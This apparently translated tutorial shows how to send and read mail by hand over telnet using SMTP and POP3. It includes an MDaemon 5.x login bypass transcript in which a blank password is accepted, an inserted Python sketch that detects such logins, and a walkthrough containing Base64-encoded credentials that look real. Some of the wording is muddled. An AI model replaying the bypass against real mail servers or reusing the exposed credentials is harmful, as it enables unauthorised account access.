The vulnerability is an old one, and an internal network is basically unable to perform such a test.
Use MDaemon 5.x as the target server.
Run the command directly:
telnet <ip> 25
Other email servers can be written in this way, but this server cannot.
In addition, the MDaemon 5.x service has an authentication vulnerability.
MDaemon 5.x authentication vulnerability
Base64 encoding
The password can be blank.
220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6 (334 Username:) // username, Base64-encoded
TURhZW1vbg== (MDaemon)
334 UGFzc3dvcmQ6 (334 Password:)
(Blank password)
235 Authentication successful
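The exchange above can be looked for in captured SMTP sessions. The following Python sketch is an added example, not part of the original text: it walks a plain-text transcript, decodes the Base64 AUTH LOGIN prompts and username, and flags any attempt where an empty password was answered with 235. The function names and the second sample session are assumptions made for illustration, and the transcript is assumed to contain raw protocol lines without annotations.

```python
import base64

# Constructed sample: raw protocol lines without annotations. The first session
# mirrors the MDaemon 5.x exchange above; the second uses made-up values.
SAMPLE = """\
220 xxx.com ESMTP MDaemon 5.0.5
250-AUTH LOGIN CRAM-MD5
AUTH LOGIN
334 VXNlcm5hbWU6
TURhZW1vbg==
334 UGFzc3dvcmQ6

235 Authentication successful
AUTH LOGIN
334 VXNlcm5hbWU6
YWxpY2U=
334 UGFzc3dvcmQ6
c2VjcmV0
535 authentication failed
"""

def b64text(token):
    """Decode one Base64 token; return None if it is not valid Base64."""
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None

def audit_auth_login(transcript):
    """Return one finding per completed AUTH LOGIN attempt in the transcript."""
    findings, cur, expect = [], None, None
    for line in (raw.strip() for raw in transcript.splitlines()):
        if expect is None and line.upper().startswith("AUTH LOGIN"):
            cur = {"user": None, "blank_password": False}
        elif cur is None:
            continue                    # not inside an AUTH LOGIN exchange
        elif expect == "user":          # client answer to the Username: prompt
            cur["user"], expect = b64text(line), None
        elif expect == "pass":          # record only whether it was empty
            cur["blank_password"], expect = (b64text(line) == ""), None
        elif line.startswith("334 "):   # server prompt, itself Base64-encoded
            prompt = (b64text(line[4:]) or "").lower()
            expect = {"user": "user", "pass": "pass"}.get(prompt[:4])
        elif line[:3] in ("235", "535"):
            cur["accepted"] = line.startswith("235")
            cur["alert"] = cur["accepted"] and cur["blank_password"]
            findings.append(cur)
            cur = None
    return findings
```

Calling audit_auth_login(SAMPLE) returns two findings; only the first (user MDaemon, empty password, 235) has alert set.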
# Test copying official text
telnet 192.168.0.1 25 ---------------------------------- use the telnet command to connect to port 25 of the server
Trying 192.168.0.1... ---------------------------------------- connecting to port 25 of the server
Connected to 192.168.0.1. ----------------------------- port 25 of the server is successfully connected
220 localhost ESMTP Postfix-by ExtMail ------------ the server displays its ID (set by smtpd_banner in main.cf)
Helo test.com ------------------------------------------ identify the client to the server; the mail is not authenticated, so you can skip the following steps and go directly to the mail from command
250 localhost
Ehlo test.com -------------------------------------------- ESMTP command; the mail must be authenticated
250-localhost
250-PIPELINING
250-SIZE 102400000
250-VRFY
250-ETRN
250-AUTH LOGIN PLAIN
250-AUTH=LOGIN PLAIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
Auth login ------------------------------------------------- perform user identity authentication
334 VXNlcm5hbWU6
Y29zdGFAYW1heGl0Lm5ldA== ----------------------------------- Base64-encoded user name
334 UGFzc3dvcmQ6
MTk4MjIxNA== ------------------------------------------------- Base64-encoded password
235 Authentication successful ---------------------------- authentication successful
(535 authentication failed --------------------------------- identity authentication failed)
Mail from:<test1@domain.com> ------------------------------ mail from address test1@domain.com
250 OK ------------------------------------------------------- command executed successfully
Rcpt to:<test2@domain.com> -------------------------------- deliver to address test2@domain.com
250 OK ------------------------------------------------------- command executed successfully
Data --------------------------------------------------------- initialize data transmission
354 End data with <CR><LF>.<CR><LF> ------------------------------------------- start data transmission
Mail sent to accounts in a domain hosted on the system can skip identity authentication.
# Test copying official text
Authentication is not required for personal testing.
Correct mail format:
From: test1@domain.com
To: test2@domain.com
Date: Mon, 25 Oct 2004 14:24:27 +0800
Subject: test mail

Hi, test2
This is a test mail, you don't reply it.
Key point: these headers must be written out in full, by hand, following the regular mail format.
------------------------------------------------------------ data content, including Base64-encoded mail content; end the data transmission with <CR><LF>.<CR><LF>
250 OK: queued as 2F6DE3929 ----------------------------------- Command Execution successful
Quit --------------------------------------------------------- end the session
221 Bye
Connection closed by foreign host. ------------------------- disconnect
PS:
Cmd commands for other emails
Mail from: // mail sender
Rcpt to: <Destination Address> // recipient address
Data // tell the server that what follows is the content of the email
From: <Destination Address>
Subject: topic
Data: Body content
. // end
Check the mail in your own mailbox on the POP3 server.
telnet <address> 110
User // user name
Pass // password
Stat // view mailbox status
List
List
Retr // View a specific email (including mail routing information)